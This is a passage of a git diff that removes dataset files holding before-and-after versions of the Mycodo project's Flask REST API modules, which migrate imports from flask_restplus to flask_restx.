coding=utf-8 -import logging - -from flask import Blueprint -from flask import make_response -from flask_restx import Api - -logger = logging.getLogger(__name__) - -api_blueprint = Blueprint('api', __name__, url_prefix='/api') - -authorizations = { - 'apikey': { - 'type': 'apiKey', - 'in': 'header', - 'name': 'X-API-KEY' - } -} - -default_responses = { - 200: 'Success', - 401: 'Invalid API Key', - 403: 'Insufficient Permissions', - 404: 'Not Found', - 422: 'Unprocessable Entity', - 429: 'Too Many Requests', - 500: 'Internal Server Error' -} - -api = Api( - api_blueprint, - version='1.0', - title='Mycodo API', - description='A REST API for Mycodo', - authorizations=authorizations, - default_mediatype='application/vnd.mycodo.v1+json' -) - -# Remove default accept header content type -if 'application/json' in api.representations: - del api.representations['application/json'] - -# Add API v1 + json accept content type -@api.representation('application/vnd.mycodo.v1+json') -def api_v1(data, code, headers): - if data is None: - data = {} - resp = make_response(data, code) - resp.headers.extend(headers) - return resp - -# To be used when v2 of the API is released -# @api.representation('application/vnd.mycodo.v2+json') -# def api_v2(data, code, headers): -# resp = make_response(data, code) -# resp.headers.extend(headers) -# return resp - - -def init_api(app): - import mycodo.mycodo_flask.api.choices - import mycodo.mycodo_flask.api.controller - import mycodo.mycodo_flask.api.daemon - import mycodo.mycodo_flask.api.input - import mycodo.mycodo_flask.api.math - import mycodo.mycodo_flask.api.measurement - import mycodo.mycodo_flask.api.output - import mycodo.mycodo_flask.api.pid - import mycodo.mycodo_flask.api.settings - - app.register_blueprint(api_blueprint) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.diff deleted file mode 100644 index 13ca9a9..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/choices.py b/mycodo/mycodo_flask/api/choices.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/choices.py - +++ b/mycodo/mycodo_flask/api/choices.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import Input - from mycodo.databases.models import Math diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.source.py deleted file mode 100644 index a13db2f..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.source.py +++ /dev/null @@ -1,228 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import Input -from mycodo.databases.models import Math -from mycodo.databases.models import Measurement -from mycodo.databases.models import Output -from mycodo.databases.models import PID -from mycodo.databases.models import Unit -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general -from mycodo.utils.system_pi import add_custom_measurements -from mycodo.utils.system_pi import add_custom_units - -logger = logging.getLogger(__name__) - -ns_choices = api.namespace( - 'choices', description='Form choice operations') - -choices_item_value_fields = ns_choices.model('Choices Controller Fields', { - 'item': fields.String, - 'value': fields.String -}) - -choices_controllers_list_fields = ns_choices.model( - 'Choices Controller Fields List', { - 'choices controllers': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_inputs_measurements_list_fields = ns_choices.model( - 'Choices Inputs Measurements Fields List', { - 'choices inputs measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_maths_measurements_list_fields = ns_choices.model( - 'Choices Maths Measurements Fields List', { - 'choices maths measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_outputs_measurements_list_fields = ns_choices.model( - 'Choices Outputs Measurements Fields List', { - 'choices outputs measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_outputs_device_measurements_list_fields = ns_choices.model( - 'Choices Outputs Device Measurements Fields List', { - 'choices outputs devices': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_pids_measurements_list_fields = ns_choices.model( - 'Choices PIDs Measurements Fields List', { - 'choices pids measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - - -@ns_choices.route('/controllers') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesControllers(Resource): - """Form choices for controllers""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_controllers_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all controllers""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - choices_controllers = utils_general.choices_controller_ids() - return {'choices controllers': choices_controllers}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/inputs/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesInputMeasurements(Resource): - """Form choices for input measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_inputs_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all input measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - input_dev = Input.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - input_choices = utils_general.choices_inputs( - input_dev, dict_units, dict_measurements) - - if input_choices: - return {'choices inputs measurements': input_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/maths/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesMaths(Resource): - """Form choices for math measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_maths_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all math measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - math = Math.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - math_choices = utils_general.choices_maths( - math, dict_units, dict_measurements) - - if math_choices: - return {'choices maths measurements': math_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/outputs/devices') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesOutputDevices(Resource): - """Form choices for output devices""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_outputs_device_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all output devices""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - choices_output_devices = utils_general.choices_output_devices( - Output.query.all()) - return {'choices outputs devices': choices_output_devices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/outputs/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesOutputMeasurements(Resource): - """Form choices for output measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_outputs_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all output measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - output = Output.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - output_choices = utils_general.choices_outputs( - output, dict_units, dict_measurements) - - if output_choices: - return {'choices outputs measurements': output_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/pids/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesPIDs(Resource): - """Form choices for pid measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_pids_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all PID measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - pid = PID.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - pid_choices = utils_general.choices_pids( - pid, dict_units, dict_measurements) - - if pid_choices: - return {'choices pids measurements': pid_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.target.py deleted file mode 100644 index f2668de..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$choices.py.target.py +++ /dev/null @@ -1,228 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import Input -from mycodo.databases.models import Math -from mycodo.databases.models import Measurement -from mycodo.databases.models import Output -from mycodo.databases.models import PID -from mycodo.databases.models import Unit -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general -from mycodo.utils.system_pi import add_custom_measurements -from mycodo.utils.system_pi import add_custom_units - -logger = logging.getLogger(__name__) - -ns_choices = api.namespace( - 'choices', description='Form choice operations') - -choices_item_value_fields = ns_choices.model('Choices Controller Fields', { - 'item': fields.String, - 'value': fields.String -}) - -choices_controllers_list_fields = ns_choices.model( - 'Choices Controller Fields List', { - 'choices controllers': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_inputs_measurements_list_fields = ns_choices.model( - 'Choices Inputs Measurements Fields List', { - 'choices inputs measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_maths_measurements_list_fields = ns_choices.model( - 'Choices Maths Measurements Fields List', { - 'choices maths measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_outputs_measurements_list_fields = ns_choices.model( - 'Choices Outputs Measurements Fields List', { - 'choices outputs measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_outputs_device_measurements_list_fields = ns_choices.model( - 'Choices Outputs Device Measurements Fields List', { - 'choices outputs devices': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - -choices_pids_measurements_list_fields = ns_choices.model( - 'Choices PIDs Measurements Fields List', { - 'choices pids measurements': fields.List( - fields.Nested(choices_item_value_fields)), - } -) - - -@ns_choices.route('/controllers') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesControllers(Resource): - """Form choices for controllers""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_controllers_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all controllers""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - choices_controllers = utils_general.choices_controller_ids() - return {'choices controllers': choices_controllers}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/inputs/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesInputMeasurements(Resource): - """Form choices for input measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_inputs_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all input measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - input_dev = Input.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - input_choices = utils_general.choices_inputs( - input_dev, dict_units, dict_measurements) - - if input_choices: - return {'choices inputs measurements': input_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/maths/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesMaths(Resource): - """Form choices for math measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_maths_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all math measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - math = Math.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - math_choices = utils_general.choices_maths( - math, dict_units, dict_measurements) - - if math_choices: - return {'choices maths measurements': math_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/outputs/devices') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesOutputDevices(Resource): - """Form choices for output devices""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_outputs_device_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all output devices""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - choices_output_devices = utils_general.choices_output_devices( - Output.query.all()) - return {'choices outputs devices': choices_output_devices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/outputs/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesOutputMeasurements(Resource): - """Form choices for output measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_outputs_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all output measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - output = Output.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - output_choices = utils_general.choices_outputs( - output, dict_units, dict_measurements) - - if output_choices: - return {'choices outputs measurements': output_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_choices.route('/pids/measurements') -@ns_choices.doc(security='apikey', responses=default_responses) -class ChoicesPIDs(Resource): - """Form choices for pid measurements""" - - @accept('application/vnd.mycodo.v1+json') - @ns_choices.marshal_with(choices_pids_measurements_list_fields) - @flask_login.login_required - def get(self): - """Show form choices for all PID measurements""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - pid = PID.query.all() - dict_measurements = add_custom_measurements( - Measurement.query.all()) - dict_units = add_custom_units(Unit.query.all()) - pid_choices = utils_general.choices_pids( - pid, dict_units, dict_measurements) - - if pid_choices: - return {'choices pids measurements': pid_choices}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.diff deleted file mode 100644 index f904a8c..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/controller.py b/mycodo/mycodo_flask/api/controller.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/controller.py - +++ b/mycodo/mycodo_flask/api/controller.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.mycodo_client import DaemonControl - from mycodo.mycodo_flask.api import api diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.source.py deleted file mode 100644 index ace84d0..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.source.py +++ /dev/null @@ -1,80 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_controller = api.namespace( - 'controllers', description='Controller operations') - -controller_status_fields = ns_controller.model('Controller Status Fields', { - 'is_active': fields.Boolean -}) - -controller_set_fields = ns_controller.model('Controller Modulation Fields', { - 'activate': fields.Boolean( - description='Activate (1) or deactivate (0) a controller.', - required=True) -}) - - -@ns_controller.route('/') -@ns_controller.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the controller.' - } -) -class ControllerStatus(Resource): - """Controller status""" - - @accept('application/vnd.mycodo.v1+json') - @ns_controller.marshal_with(controller_status_fields) - @flask_login.login_required - def get(self, unique_id): - """Get the status of a controller""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - active = control.controller_is_active(unique_id) - return {'is_active': active}, 200 - except Exception: - abort(500, custom=traceback.format_exc()) - - @accept('application/vnd.mycodo.v1+json') - @ns_controller.expect(controller_set_fields) - @flask_login.login_required - def post(self, unique_id): - """Activate or deactivate a controller""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - if not ns_controller.payload or 'activate' not in ns_controller.payload: - abort(422, message='missing "activate" in payload') - - try: - control = DaemonControl() - if ns_controller.payload and ns_controller.payload['activate']: - activate = control.controller_activate(unique_id) - else: - activate = control.controller_deactivate(unique_id) - if activate[0]: - return {'message': activate[1]}, 460 - else: - return {'message': activate[1]}, 200 - except Exception: - abort(500, custom=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.target.py deleted file mode 100644 index 9466898..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$controller.py.target.py +++ /dev/null @@ -1,80 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_controller = api.namespace( - 'controllers', description='Controller operations') - -controller_status_fields = ns_controller.model('Controller Status Fields', { - 'is_active': fields.Boolean -}) - -controller_set_fields = ns_controller.model('Controller Modulation Fields', { - 'activate': fields.Boolean( - description='Activate (1) or deactivate (0) a controller.', - required=True) -}) - - -@ns_controller.route('/') -@ns_controller.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the controller.' - } -) -class ControllerStatus(Resource): - """Controller status""" - - @accept('application/vnd.mycodo.v1+json') - @ns_controller.marshal_with(controller_status_fields) - @flask_login.login_required - def get(self, unique_id): - """Get the status of a controller""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - active = control.controller_is_active(unique_id) - return {'is_active': active}, 200 - except Exception: - abort(500, custom=traceback.format_exc()) - - @accept('application/vnd.mycodo.v1+json') - @ns_controller.expect(controller_set_fields) - @flask_login.login_required - def post(self, unique_id): - """Activate or deactivate a controller""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - if not ns_controller.payload or 'activate' not in ns_controller.payload: - abort(422, message='missing "activate" in payload') - - try: - control = DaemonControl() - if ns_controller.payload and ns_controller.payload['activate']: - activate = control.controller_activate(unique_id) - else: - activate = control.controller_deactivate(unique_id) - if activate[0]: - return {'message': activate[1]}, 460 - else: - return {'message': activate[1]}, 200 - except Exception: - abort(500, custom=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.diff deleted file mode 100644 index 4d9f3b6..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/daemon.py b/mycodo/mycodo_flask/api/daemon.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/daemon.py - +++ b/mycodo/mycodo_flask/api/daemon.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.mycodo_client import DaemonControl - from mycodo.mycodo_flask.api import api diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.source.py deleted file mode 100644 index 4a2ed84..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.source.py +++ /dev/null @@ -1,84 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_daemon = api.namespace('daemon', description='Daemon operations') - -daemon_status_fields = ns_daemon.model('Daemon Status Fields', { - 'is_running': fields.Boolean, - 'RAM': fields.Float, - 'python_virtual_env': fields.Boolean -}) - -daemon_terminate_fields = ns_daemon.model('Daemon Terminate Fields', { - 'terminated': fields.Boolean -}) - - -@ns_daemon.route('/') -@ns_daemon.doc(security='apikey', responses=default_responses) -class DaemonStatus(Resource): - """Checks information about the daemon""" - - @accept('application/vnd.mycodo.v1+json') - @ns_daemon.marshal_with(daemon_status_fields) - @flask_login.login_required - def get(self): - """Get the status of the daemon""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - status = control.daemon_status() - ram = control.ram_use() - virtualenv = control.is_in_virtualenv() - if status == 'alive': - return { - 'is_running': True, - 'RAM': ram, - 'python_virtual_env': virtualenv - }, 200 - except Exception: - return { - 'is_running': False, - 'RAM': None, - 'python_virtual_env': None - }, 200 - - -@ns_daemon.route('/terminate') -@ns_daemon.doc(security='apikey', responses=default_responses) -class DaemonTerminate(Resource): - """Checks information about the daemon""" - - @accept('application/vnd.mycodo.v1+json') - @ns_daemon.marshal_with(daemon_terminate_fields) - @flask_login.login_required - def post(self): - """Shut down the daemon""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - terminate = control.terminate_daemon() - if terminate: - return {'terminated': terminate}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.target.py deleted file mode 100644 index 5cf046c..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$daemon.py.target.py +++ /dev/null @@ -1,84 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_daemon = api.namespace('daemon', description='Daemon operations') - -daemon_status_fields = ns_daemon.model('Daemon Status Fields', { - 'is_running': fields.Boolean, - 'RAM': fields.Float, - 'python_virtual_env': fields.Boolean -}) - -daemon_terminate_fields = ns_daemon.model('Daemon Terminate Fields', { - 'terminated': fields.Boolean -}) - - -@ns_daemon.route('/') -@ns_daemon.doc(security='apikey', responses=default_responses) -class DaemonStatus(Resource): - """Checks information about the daemon""" - - @accept('application/vnd.mycodo.v1+json') - @ns_daemon.marshal_with(daemon_status_fields) - @flask_login.login_required - def get(self): - """Get the status of the daemon""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - status = control.daemon_status() - ram = control.ram_use() - virtualenv = control.is_in_virtualenv() - if status == 'alive': - return { - 'is_running': True, - 'RAM': ram, - 'python_virtual_env': virtualenv - }, 200 - except Exception: - return { - 'is_running': False, - 'RAM': None, - 'python_virtual_env': None - }, 200 - - -@ns_daemon.route('/terminate') -@ns_daemon.doc(security='apikey', responses=default_responses) -class DaemonTerminate(Resource): - """Checks information about the daemon""" - - @accept('application/vnd.mycodo.v1+json') - @ns_daemon.marshal_with(daemon_terminate_fields) - @flask_login.login_required - def post(self): - """Shut down the daemon""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - terminate = control.terminate_daemon() - if terminate: - return {'terminated': terminate}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.diff deleted file mode 100644 index a138b80..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/input.py b/mycodo/mycodo_flask/api/input.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/input.py - +++ b/mycodo/mycodo_flask/api/input.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import Input diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.source.py deleted file mode 100644 index 519b66f..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.source.py +++ /dev/null @@ -1,120 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Input -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import input_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_input = api.namespace('inputs', description='Input operations') - -input_single_fields = api.model('Input Status Fields', { - 'input settings': fields.Nested(input_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -input_list_fields = api.model('Input Fields List', { - 'input settings': fields.List(fields.Nested(input_fields)), -}) - - -@ns_input.route('/') -@ns_input.doc(security='apikey', responses=default_responses) -class Inputs(Resource): - """Input information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_input.marshal_with(input_list_fields) - @flask_login.login_required - def get(self): - """Show all input settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(InputSchema, Input) - if list_data: - return {'input settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_input.route('/') -@ns_input.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input'} -) -class SettingsInputsUniqueID(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_input.marshal_with(input_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an input""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(InputSchema, Input, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'input settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_input.route('//force-measurement') -@ns_input.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input.'} -) -class InputsUniqueID(Resource): - """Input with Unique ID""" - - @accept('application/vnd.mycodo.v1+json') - @flask_login.login_required - def post(self, unique_id): - """Force an input to acquire measurements""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - return_ = control.input_force_measurements(unique_id) - if return_[0]: - return {'message': return_[1]}, 460 - else: - return {'message': return_[1]}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.target.py deleted file mode 100644 index 5bacf34..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$input.py.target.py +++ /dev/null @@ -1,120 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Input -from mycodo.databases.models.input import InputSchema -from 